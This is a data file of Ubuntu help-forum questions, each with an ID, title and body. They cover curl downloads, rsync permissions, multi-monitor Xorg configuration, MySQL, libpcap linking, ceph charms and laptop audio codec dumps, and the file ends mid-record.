343287	download incomplete through 'curl '	i am trying to download a file using 'curl ' . i am typing in : curl -o http : //geolite.maxmind.com/download/geoip/database/geolitecity.dat.gz the actual file size is 15.9 mb , however the file downloaded has a size of only 170 bytes . why does the download stop without any error or notification ? please help me resolve the issue .
343288	kile ' [ pdflatex ] failed to start ' when using tex live 2013 + self compiled kile	on ubuntu 13.04 i installed tex live 2013 and then compiled kile from source ( in order to avoid the large amount of dependencies that come with ubuntu 's version of kile ) . kile runs , but when i tried to compile a .tex file using pdflatex i got the following error message : [ pdflatex ] failed to start how do i make kile find pdflatex ?
343292	browing local sharing site in ubuntu	i use a local area internet connection and our isp provides a local sharing site which can be accesed by this address ( http : //newworld.net.pk ) in any browser in win xp . but this site dont work in ubuntu . remember that this is not a www site . when i type its address in chromium i get this error message '' no configuration file found and no installation code available . exiting ... '' please anybody help me !
343296	adjust monitor settings to compensate for vision problems	is there any software that allows to `` blur '' or sharpen what 's on your monitor to compensate for vision problem in ubuntu ? i sometimes forget my glasses ( i leave them at work , or forget them at home ) . and it might be useful to somehow adjust what 's on your monitor to see clearly .
343299	ubuntu stuck at black lit screen	i have ubuntu 12.04 64-bit on my intel laptop is not booting up . before this happened i installed many libraries and dependencies and installed java and android sdk and added their paths to barsch and .profile , but now , when i restarted my laptop : grub loads i selected ubuntu ... then it showed a purple screen for about 15 seconds ... then ubuntu logo for less than half a second ... then a black lit screen and stuck there for ever i can increase or decrease brightness , but still black screen ... then being tired , i tried pressing power button ... the ubuntu logo sprang up and laptop powered off i do n't feel like re-installing ubuntu i had already downloaded and installed gigs . please can someone suggest a fix for this . edit first of all thanks saurav kumar for quick reply but that didnt help when i got to black screen i did press the combo but nothing showed up ... i went into recovery mode ... there it showed last login via tty ... there i ran reconfigure command in terminal with root access and rebooted but it didnt work ... . : ( any other method ? ? edit2 thanks for answering..might help some other ppl searching for this ... for me burn that i had emergency so i reinstalled ubuntu
343301	partition errors in windows 8 after running ubuntu 13.04	i have dual boot windows 8 and ubunu 13.04 ( secure & fast boot off , c : \ win8 , d : \ shared partition ntfs , and 2 ext4 partitions for ubuntu \ and \home ) . when i 'm in ubuntu , everything works fine , but when i start windows 8 and run `` error checking '' there are errors . windows fixes it , but sometimes files are missing from d : \ or they are corrupted ( like 0 b size ) ... fast boot is disabled ( bcdedit /set disabledynamictick yes ) - no change . hibernation disabled ( powercfg /h off ) - no change . i have important documents on d : \ drive and i 'm afraid to open any of them in ubuntu and then run windows 8 . any ideas ... ? ? ? thanks ...
343304	sudo -hu rsyncuser rsync -- progress -avz /source/path/ host.org : /destination/path/ - why does it change directory permissions ?	here is my setup : on my source machine i created user rsyncuser with reading and writing permissions in /source/path on my destination machine i created user rsyncuser with reading and writing permissions in /destination/path to use virtualmins scheduled backup feature ( cron ) i need to run my command as root . i do not wan na rsync directly as root ( simply because no one can answer this question how to use rsync via ssh with rsa key passphrases ? -- - a solution including passphrases is searched for ) , so i am trying to use sudo -hu . however there must be some error in my command/logic , 'cuz after running this command as root from the source machine : sudo -hu rsyncuser rsync -- progress -avz /source/path/ messerliweb.ch : /destination/path/ i get lots of permission errors : rsync : failed to modify permissions on `` /destination/path/ . `` : permission denied ( 13 ) rsync : recv_generator : failed to stat `` /destination/path/x1.tar.gz '' : permission denied ( 13 ) rsync : recv_generator : failed to stat `` /destination/path/x2.tar.gz '' : permission denied ( 13 ) etc . according to http : //rafaelwolf.com/ ? p=683 this could be due to lacking write permissions in the source folder . so i chmod'ded those . to no avail . however what i can not understand is that after running my command , file permissions for /destination/path are changed and my rsync user can not cd into the directory anymore ! before running the command cd and writing in this directory was possible for user rsyncuser . ( i tested this multiple times ) afterwards i get : bash : cd : /destination/path : permission denied why does rsync mess with my file permissions ? or is it sudo -hu ? when i chmod back my file permissions for rsync on my destination machine , everything seems normal again , that is until i run my rsync command again - then writing and cd permissions are lost again . what the heck ? edit : adding -- chmod=u=rwx , g=rwx , o=rwx seems to omit my problem . however i 'd still be grateful if someone could help me understand why rsync changes file permissions ?
343305	2 video cards and ubuntu 13.04	quadro nvs 290 and quadro fx 540 with 4 monitors and it works great in 12.10 using unity 2d ... but i would like to get to 13.04 ( 13.10 when oct comes ) how can i get my 4 monitors to work without unity 2d ? section `` serverlayout '' # removed option `` xinerama '' `` 0 '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' 2560 0 screen 2 `` screen2 '' 1280 0 screen 3 `` screen3 '' 3840 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 1 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` hp l1950 '' horizsync 24.0 - 83.0 vertrefresh 50.0 - 77.0 option `` dpms '' endsection section `` monitor '' # horizsync source : unknown , vertrefresh source : unknown identifier `` monitor1 '' vendorname `` unknown '' modelname `` hp l1950 '' horizsync 24.0 - 83.0 vertrefresh 50.0 - 77.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor2 '' vendorname `` unknown '' modelname `` hp l1950 '' horizsync 24.0 - 83.0 vertrefresh 50.0 - 77.0 endsection section `` monitor '' identifier `` monitor3 '' vendorname `` unknown '' modelname `` hp l1950 '' horizsync 24.0 - 83.0 vertrefresh 50.0 - 77.0 endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro nvs 290 '' busid `` pci:5:0:0 '' screen 0 endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro fx 540 '' busid `` pci:4:0:0 '' screen 0 endsection section `` device '' identifier `` device2 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro nvs 290 '' busid `` pci:5:0:0 '' screen 1 endsection section `` device '' identifier `` device3 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro fx 540 '' busid `` pci:4:0:0 '' screen 1 endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 ; dfp-0 : nvidia-auto-select +0+0 ; dfp-0 : 1280x1024_75 +0+0 ; dfp-0 : 1024x768 +0+0 ; dfp-0 : 1024x768_70 +0+0 ; dfp-0 : 1024x768_60 +0+0 ; dfp-0 : 800x600 +0+0 ; dfp-0 : 800x600_72 +0+0 ; dfp-0 : 800x600_60 +0+0 ; dfp-0 : 640x480 +0+0 ; dfp-0 : 640x480_72 +0+0 ; dfp-0 : 640x480_60 +0+0 ; dfp-0 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` crt-0 : nvidia-auto-select +0+0 ; crt-0 : nvidia-auto-select +0+0 ; crt-0 : 1280x1024_75 +0+0 ; crt-0 : 1024x768 +0+0 ; crt-0 : 1024x768_70 +0+0 ; crt-0 : 1024x768_60 +0+0 ; crt-0 : 800x600 +0+0 ; crt-0 : 800x600_72 +0+0 ; crt-0 : 800x600_60 +0+0 ; crt-0 : 640x480 +0+0 ; crt-0 : 640x480_72 +0+0 ; crt-0 : 640x480_60 +0+0 ; crt-0 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` device2 '' monitor `` monitor2 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` dfp-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen3 '' device `` device3 '' monitor `` monitor3 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` crt-1 '' option `` metamodes '' `` crt-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` extensions '' option `` composite '' `` disable '' endsection
343306	install cx_oracle on ubuntu 12.04 lts	i 'm trying to install cx_oracle for python on ubuntu 12.04 lts ( 64 bit ) . i 've installed instant client package from : http : //www.oracle.com/technetwork/topics/linuxx86-64soft-092277.html i did it using alien for converting to dpm and then used dpkg -i. i 've installed cx_oracle from ( centos 5 x86_64 rpm ( oracle 11g , python 2.7 ) ) : http : //cx-oracle.sourceforge.net/ i did it using alien for converting to dpm and then used dpkg -i . however , trying to import cx_oracle just reports : file `` test.py '' , line 1 , in < module > import cx_oracle importerror : no module named cx_oracle
343307	save mysql ouput as text ?	i am using ubuntu 13.04 and installed mysql server version : 5.5 . all i want simply , if i doing a mysql query then its output should have to store in a text file . how can i achieve this ? for example : select * from raja then output of table raja should have to store in a text file along with terminal display . thank you .
343313	any way for auto-tab in mysql ?	using mysql version 5.5 in ubuntu 13.04.is there any way for enabling auto-completion with tab in mysql ? i 'd like to auto-tab for table names , database names , commands etc , .
343316	changing the form and arrangement of the workspaces	lets say that i have 4 workspaces in a row , which are looking like this : how can i make the workspaces look like this ? so , if i am for example ( i 'm talking about the purple figure ) on the leftmost workspace and i press ctrl + alt + rightarrow and ctrl + alt + downarrow , it should bring me to the downmost workspace . i 'm using gnome classic desktop .
343319	whats wrong with my sql command	first of all i am following this tutorial . as they mentioned i am writing my query as : mysql > grant select - > on play . * - > to 'guest ' @ 'localhost' - > identified by '459459 ' ; error 1064 ( 42000 ) : you have an error in your sql syntax ; check the manual that corresponds to your mysql server version for the right syntax to use near ''localhost' identified by '459459 '' at line 3 mysql > but i am still getting an error . what is it that i am doing wrong ?
343328	how to read ebooks ? ( .acsm )	i have downloaded an e-book , and want to read e-book . e-book format is .acsm . i have tried with fbreader , calibre , ppub , and lucidor without success . what should i do to be able to read the e-book ? sorry for my bad english .
343330	i get compiling error using rohc and libpcap library	i am using ubuntu 12.10 32-bit.in my project i am using rohc and libpcap library . when i run simple pcap program like- # include < stdio.h > # include < pcap.h > int main ( int argc , char *argv [ ] ) { char *dev , errbuf [ pcap_errbuf_size ] ; dev = pcap_lookupdev ( errbuf ) ; if ( dev == null ) { fprintf ( stderr , `` could n't find default device : % s\n '' , errbuf ) ; return ( 2 ) ; } printf ( `` device : % s\n '' , dev ) ; return ( 0 ) ; } it is give a proper ouput . but when i run this program- # include < pcap/pcap.h > int main ( int argc , char *argv [ ] ) { pcap_t *handle ; handle = pcap_open_dead ( dlt_linux_sll , 5 ) ; pcap_close ( handle ) ; return 0 ; } i found this type of error ttempt to open /lib/i386-linux-gnu/libc.so.6 succeeded /lib/i386-linux-gnu/libc.so.6 attempt to open /usr/lib/i386-linux-gnu/libc_nonshared.a succeeded ( /usr/lib/i386-linux-gnu/libc_nonshared.a ) elf-init.os attempt to open /lib/i386-linux-gnu/ld-linux.so.2 succeeded /lib/i386-linux-gnu/ld-linux.so.2 attempt to open /usr/lib/gcc/i686-linux-gnu/4.8/libgcc.so failed attempt to open /usr/lib/gcc/i686-linux-gnu/4.8/libgcc.a succeeded attempt to open /usr/lib/gcc/i686-linux-gnu/4.8/libgcc_s.so succeeded -lgcc_s ( /usr/lib/gcc/i686-linux-gnu/4.8/libgcc_s.so ) attempt to open /usr/lib/gcc/i686-linux-gnu/4.8/crtend.o succeeded /usr/lib/gcc/i686-linux-gnu/4.8/crtend.o attempt to open /usr/lib/gcc/i686-linux-gnu/4.8/../../../i386-linux-gnu/crtn.o succeeded /usr/lib/gcc/i686-linux-gnu/4.8/../../../i386-linux-gnu/crtn.o ld-linux.so.2 needed by /lib/i386-linux-gnu/libc.so.6 found ld-linux.so.2 at /lib/i386-linux-gnu/ld-linux.so.2 /tmp/cca6llt3.o : in function `main ' : test_pcap.c : ( .text+0x19 ) : undefined reference to `pcap_open_dead' test_pcap.c : ( .text+0x29 ) : undefined reference to `pcap_close' collect2 : error : ld returned 1 exit status another program also give same error- # include < stdlib.h > # include < stdio.h > # include < rohc.h > int main ( int argc , char **argv ) { printf ( `` rohc version % s\n '' , rohc_version ( ) ) ; return 0 ; } # include < stdlib.h > # include < stdio.h > # include < rohc.h > int main ( int argc , char **argv ) { printf ( `` rohc version % s\n '' , rohc_version ( ) ) ; return 0 ; } i also check libpcap and rohc library they are properly install and passes all test without any error . i think that in my system ld creates a problem in linking . give any suggestion regarding this .
343331	can i install ubuntu on a partition with windows 7 ?	can i install ubuntu on the same partition as windows 7 ? and what 's the difference from the 64-bit version and the 32-bit one ?
343333	what 's the difference between a ppa and a repository ?	i recently posted an answer where i write add the ppa , but i know realize that i have no idea what the difference between a ppa and a repository is . so can someone please explain it to me ?
343335	what is the performance difference between booting ubuntu from a usb v2 and usb v3 ?	i like the idea of booting from a usb drive . i probably have 50 usb 2.0 drives of various sizes , but i only have 2 usb 3.0 drives currently . if i boot from a usb 3.0 , will the increased read/write speeds make a noticeable difference in performance ?
343343	installing wordpress in ubuntu 13.04	i downloaded wordpress3.6.tar.gz file from wordpress.org i want to move that from my default downloads folder to /opt/lampp/htdocs folder and also un-zip it please help me out with this i 'm new to this ubuntu
343344	is there a tool like xming to manage x11 forwarded applications ?	sorry the title is not quite clear . with x11 forwarding , i could run application on the remote server but see it on the local client . normally i do this by : local $ ssh -x remote_server remote $ xclock is there a tool like xming that could manage all these steps ? i mean i do not have to open a remote login explicitly . the tool will open it if necessary . and i do not have to run the application by type its command . just like i run other applications , for example from a menu .
343349	installing ceph and ceph-osd charms on same machine ?	i have 3 ceph nodes , i have decided to install ceph monitor plus ceph osd on all 3 servers . in ordee to do that i deployed 1st ceph charm on all 3 nodes . till here everything was fine , i was even able to see ceph health status as `` ok '' . then i installed ceph-osd to 1st unit ( which is already deployed with ceph charm ) and then added 2 more units ( which were already deployed with ceph charm ) to ceph-osd service . and then i did juju add-relation ceph ceph-osd , i am getting following result , ceph : charm : local : precise/ceph-92 exposed : false relations : mon : - ceph osd : - ceph-osd units : ceph/0 : agent-state : error agent-state-info : 'hook failed : `` relation-joined '' ' agent-version : 1.12.0 machine : `` 1 '' public-address : cs1.master ceph/1 : agent-state : error agent-state-info : 'hook failed : `` relation-joined '' ' agent-version : 1.12.0 machine : `` 2 '' public-address : cs2.master ceph/2 : agent-state : error agent-state-info : 'hook failed : `` relation-joined '' ' agent-version : 1.12.0 machine : `` 3 '' public-address : cs3.master ceph-osd : charm : local : precise/ceph-osd-7 exposed : false relations : mon : - ceph units : ceph-osd/0 : agent-state : started agent-version : 1.12.0 machine : `` 1 '' public-address : cs1.master ceph-osd/1 : agent-state : started agent-version : 1.12.0 machine : `` 2 '' public-address : cs2.master ceph-osd/2 : agent-state : started agent-version : 1.12.0 machine : `` 3 '' public-address : cs3.master 'hook failed : `` relation-joined '' ' how can i resolve this error ? also now ceph status is giving error , cs1 : ~ $ sudo ceph statusunable to find any monitors in conf . please specify monitors via -m monaddr or -c ceph.conf 2013-09-09 09:13:06.723165 7fed6793c780 -1 ceph_tool_common_init failed .
343358	failed to download repository information	update manager says failed to download repository information . check your internet connection i am connected to internet . update manager shows last update to be a month ago while i have responded to update notifications .
343361	how to remove java ?	i installed java using the terminal and i also installed java using wine to try and run a windows app and well did n't work so now i want to remove all java 100 % . how do i go about doing so ? java version `` 1.7.0_25 ''
343363	installing on a lenovo thinkpad t43	i have a lenovo thinkpad t43 running on windows xp sp3 . i am very much curious with ubuntu and i would like to try it out . do i need drivers when i install it ? can i erase xp and install a fresh os ( ubuntu ) without needing drivers ?
343365	batch program to copy files from one folder to another folder	this is what i am trying to achieve . i have two folders src and destination . src contains several subdirectories and files in it . a batch file should be built upon clicking it the following should be done delete all contents from destination folder copies all the files/subdirectories from src to destination can someone help me with this ? . if this activity requires significant effort ( i donât know whether the above is simple to implement or not ) , do point me some resources for me to dig into it .
343374	has unity-revamped stopped working ?	i 'm running a fairly recent install of ubuntu 12.04 and i 'm trying to get windows to minimize from the launcher . this answer recommends the unity-revamped ppa , and there is also the unity-minimize-on-click patch available . i have tried both but neither seems to work : after installing the ppa 's and rebooting , there is no noticeable change . i also found this question from a year ago , which complained about a similar issue . this was caused by an update to unity 5.16.0 , which took some time to propagate into a suitably updated version of unity-revamped . i note , therefore , that i 'm running unity 5.20.0 ( or at least that 's what i get from running unity -- version ) , which was published in early july , some ten weeks ago , whereas unity-revamped says it was last built 33 weeks ago . i suspect , therefore , that the same issue is at play , but now there does not seem to be an upcoming update for revamped . is this the case ? that is , will unity-revamped not work with versions of unity built after the last revamped build ? in that case , is there a way to prompt a new build of revamped ? or will that update never happen ? should i then revert to some older version of unity ? if so , which ? or is there some other solution for this problem ? i do n't want unity-revamped per se , but i do want to minimize on click .
343375	sd/mmc card detected by the kernel but no block device created	i 'm running an acer laptop on 13.04 : 3.8.0-30-generic # 44-ubuntu smp thu aug 22 20:52:24 utc 2013 x86_64 x86_64 x86_64 gnu/linux the laptop has an sd/mmc card slot that has worked for me in the past . now , however , when i insert an sd card ( one that works in windows ) , the kernel sees it but does n't do anything with it : sep 9 10:02:49 adina-wired kernel : [ 52.552869 ] mmc0 : new high speed sdhc card at address 0001 sep 9 10:02:49 adina-wired kernel : [ 52.557819 ] mmcblk0 : mmc0:0001 00000 7.46 gib sep 9 10:02:49 adina-wired kernel : [ 52.558974 ] mmcblk0 : p1 normally there 'd be the part where it actually adds a /dev/sdx mapping , but that does n't happen . i 've tried two working sd cards with exactly the same results . i can provide lsusb , lspci , etc if that 'd help . this sort of thing happens every now and then and i 'm really mostly trying to learn how to poke around and diagnose the issue .
343376	how to purge python 3.3 and install python 2.7.4	i 'm in complete trouble with my ubuntu 13.04 distro . today i wanted to try python 3.3 , i compiled it and installed from source . it broke my system , many packages wait for apt-get remove cmmand . i tried to purge python by issuing `` sudo apt-get remove âpurge python* '' after then i still can not revert to python 2.7.4 . most importantly how can i reinstall my system ? i feel like hanging in gallow , please help .
343381	can i hide tab bar in gnome-terminal even when i use multiple tab ?	i am asking this , because i ca n't seems to find question regarding this . i love gnome-terminal , because i can copy paste from/to this terminal window , and because i already set it up to use bitmap font ( non anti alias ) , so it has the same appearance as xterm . but in my preference , one thing missing : how can i always disable/hide tab bar when i open multiple tab ? i did n't like this tab element gui . but i do n't think there is a trivial option to do it.. or , is it ?
343382	will installing ubuntu to dual boot with windows 8 slow down windows ?	i am going to install ubuntu to dual boot with windows 8 soon , but one of my friends warned me that partitioning my hard drive will slow my computer down . i run on a 500gb hdd and 8gb of ram if that helps at all . is that true if i do it ?
343387	sound plays through earphones but not through speakers	i have ubuntu 13.04 installed . after a couple of minutes after system start i only get sound through external media ( headphones , hdmi ) but not from the internal speakers . the sound card works fine in w8 . i have installed alsa and pulseaudio . i tried to fix the problem with alsamixer without any result . can anyone help me to solve the problem ? expected : sound through speakers when earphones are not connected observed : start up sound can be heared . after a couple of seconds sound though speakers stops . sound can be heared through external media ( hdmi , earphones ) but not through internal speakers i have a laptop with core i3 . i am a new user of ubuntu . what i can add is the following information : juan @ juan-a24 : ~ $ uname -r 3.8.0-30-generic juan @ juan-a24 : ~ $ lspci | grep audio 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) juan @ juan-a24 : ~ $ cat /proc/asound/card0/codec* | grep codec codec : conexant cx20585 codec : intel cougarpoint hdmi additional information : juan @ juan-a24 : ~ $ sudo lspci -nn [ sudo ] password for juan : 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0104 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 05 ) 00:1b.0 audio device [ 0403 ] : intel corporation 6 series/c200 series chipset family high definition audio controller [ 8086:1c20 ] ( rev 05 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 1 [ 8086:1c10 ] ( rev b5 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 2 [ 8086:1c12 ] ( rev b5 ) 00:1c.5 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 6 [ 8086:1c1a ] ( rev b5 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 05 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm65 express chipset family lpc controller [ 8086:1c49 ] ( rev 05 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller [ 8086:1c03 ] ( rev 05 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 05 ) 02:00.0 network controller [ 0280 ] : atheros communications inc. ar9285 wireless network adapter ( pci-express ) [ 168c:002b ] ( rev 01 ) 03:00.0 ethernet controller [ 0200 ] : qualcomm atheros ar8151 v2.0 gigabit ethernet [ 1969:1083 ] ( rev c0 ) juan @ juan-a24 : ~ $ sudo lshw -- class x hardware lister ( lshw ) - b.02.16 uso : lshw [ -formato ] [ -opciones ... ] lshw -version -versión de programa de muestra ( b.02.16 ) el formato puede ser - salida de estructura de hardware en html - salida de estructura de hardware en xml - salida de rutas cortas de hardware -businfo muestra información del bus las opciones pueden ser -class class solo muestra un cierto tipo de hardware -c class es igual que «-class class» -c class es igual que «-class class» -disable test desactiva una prueba ( tipo pci , isapnp , cpuid , etc. ) -enable test activa una prueba ( tipo pci , isapnp , cpuid , etc. ) -quiet no muestra el estado -sanitize sanea la salida ( elimina información sensible tipo números de serie , etc . ) -numeric muestra ids numéricos ( para pci , usb , etc . ) juan @ juan-a24 : ~ $ cat /proc/asound/cards 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xf7e00000 irq 43 juan @ juan-a24 : ~ $ cat /proc/asound/card0/codec # 0 codec : conexant cx20585 address : 0 afg function id : 0x1 ( unsol 1 ) vendor id : 0x14f15069 subsystem id : 0x1b0a2098 revision id : 0x100302 no modem function group found default pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm default amp-in caps : n/a default amp-out caps : n/a gpio : io=4 , o=0 , i=0 , unsolicited=1 , wake=0 io [ 0 ] : enable=0 , dir=0 , wake=0 , sticky=0 , data=0 , unsol=0 io [ 1 ] : enable=0 , dir=0 , wake=0 , sticky=0 , data=0 , unsol=0 io [ 2 ] : enable=0 , dir=0 , wake=0 , sticky=0 , data=0 , unsol=0 io [ 3 ] : enable=0 , dir=0 , wake=0 , sticky=0 , data=0 , unsol=0 node 0x10 [ audio output ] wcaps 0xc1d : stereo amp-out r/l control : name= '' speaker playback volume '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 control : name= '' speaker playback switch '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 device : name= '' conexant analog '' , type= '' audio '' , device=0 amp-out caps : ofs=0x4a , nsteps=0x4a , stepsize=0x03 , mute=1 amp-out vals : [ 0x4a 0x4a ] converter : stream=8 , channel=0 pcm : rates [ 0x560 ] : 44100 48000 96000 192000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x11 [ audio output ] wcaps 0xc1d : stereo amp-out r/l control : name= '' headphone playback volume '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 control : name= '' headphone playback switch '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 amp-out caps : ofs=0x4a , nsteps=0x4a , stepsize=0x03 , mute=1 amp-out vals : [ 0x4a 0x4a ] converter : stream=8 , channel=0 pcm : rates [ 0x560 ] : 44100 48000 96000 192000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x12 [ audio output ] wcaps 0x611 : stereo digital converter : stream=0 , channel=0 digital : digital category : 0x0 iec coding type : 0x0 pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0xe ] : 16 20 24 formats [ 0x5 ] : pcm ac3 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x13 [ beep generator widget ] wcaps 0x70000c : mono amp-out control : name= '' beep playback volume '' , index=0 , device=0 controlamp : chs=1 , dir=out , idx=0 , ofs=0 control : name= '' beep playback switch '' , index=0 , device=0 controlamp : chs=1 , dir=out , idx=0 , ofs=0 amp-out caps : ofs=0x07 , nsteps=0x07 , stepsize=0x0f , mute=0 amp-out vals : [ 0x00 ] node 0x14 [ audio input ] wcaps 0x100d1b : stereo amp-in r/l control : name= '' mic capture volume '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=0 , ofs=0 control : name= '' mic capture switch '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=0 , ofs=0 control : name= '' internal mic capture volume '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=1 , ofs=0 control : name= '' internal mic capture switch '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=1 , ofs=0 device : name= '' conexant analog '' , type= '' audio '' , device=0 amp-in caps : ofs=0x4a , nsteps=0x50 , stepsize=0x03 , mute=1 amp-in vals : [ 0x80 0x80 ] [ 0x46 0x46 ] [ 0x4a 0x4a ] [ 0x4a 0x4a ] converter : stream=4 , channel=0 sdi-select : 0 pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 4 0x17 0x18* 0x23 0x24 node 0x15 [ audio input ] wcaps 0x100d1b : stereo amp-in r/l amp-in caps : ofs=0x4a , nsteps=0x50 , stepsize=0x03 , mute=1 amp-in vals : [ 0x80 0x80 ] [ 0x4a 0x4a ] [ 0x4a 0x4a ] [ 0x4a 0x4a ] converter : stream=0 , channel=0 sdi-select : 0 pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 4 0x17* 0x18 0x23 0x24 node 0x16 [ audio input ] wcaps 0x100d1b : stereo amp-in r/l amp-in caps : ofs=0x4a , nsteps=0x50 , stepsize=0x03 , mute=1 amp-in vals : [ 0x80 0x80 ] [ 0x4a 0x4a ] [ 0x4a 0x4a ] [ 0x4a 0x4a ] converter : stream=0 , channel=0 sdi-select : 0 pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 4 0x17* 0x18 0x23 0x24 node 0x17 [ audio selector ] wcaps 0x30050d : stereo amp-out control : name= '' mic boost volume '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 amp-out caps : ofs=0x00 , nsteps=0x04 , stepsize=0x27 , mute=0 amp-out vals : [ 0x00 0x00 ] power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 4 0x1a* 0x1b 0x1d 0x1e node 0x18 [ audio selector ] wcaps 0x30050d : stereo amp-out control : name= '' internal mic boost volume '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 amp-out caps : ofs=0x00 , nsteps=0x04 , stepsize=0x27 , mute=0 amp-out vals : [ 0x04 0x04 ] power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 4 0x1a* 0x1b 0x1d 0x1e node 0x19 [ pin complex ] wcaps 0x400581 : stereo control : name= '' headphone jack '' , index=0 , device=0 pincap 0x0000001c : out hp detect pin default 0x04211040 : [ jack ] hp out at ext right conn = 1/8 , color = black defassociation = 0x4 , sequence = 0x0 pin-ctls : 0xc0 : out hp unsolicited : tag=01 , enabled=1 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 2 0x10 0x11* node 0x1a [ pin complex ] wcaps 0x400481 : stereo control : name= '' internal mic phantom jack '' , index=0 , device=0 pincap 0x00001324 : in detect vref caps : hiz 50 80 pin default 0x90a70120 : [ fixed ] mic at int n/a conn = analog , color = unknown defassociation = 0x2 , sequence = 0x0 misc = no_presence pin-ctls : 0x24 : in vref_80 unsolicited : tag=00 , enabled=0 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x1b [ pin complex ] wcaps 0x400581 : stereo control : name= '' mic jack '' , index=0 , device=0 pincap 0x00011334 : in out eapd detect vref caps : hiz 50 80 eapd 0x2 : eapd pin default 0x04a11030 : [ jack ] mic at ext right conn = 1/8 , color = black defassociation = 0x3 , sequence = 0x0 pin-ctls : 0x24 : in vref_80 unsolicited : tag=02 , enabled=1 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 2 0x10* 0x11 node 0x1c [ pin complex ] wcaps 0x400581 : stereo pincap 0x00000014 : out detect pin default 0x400001f0 : [ n/a ] line out at ext n/a conn = unknown , color = unknown defassociation = 0xf , sequence = 0x0 misc = no_presence pin-ctls : 0x40 : out unsolicited : tag=00 , enabled=0 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , 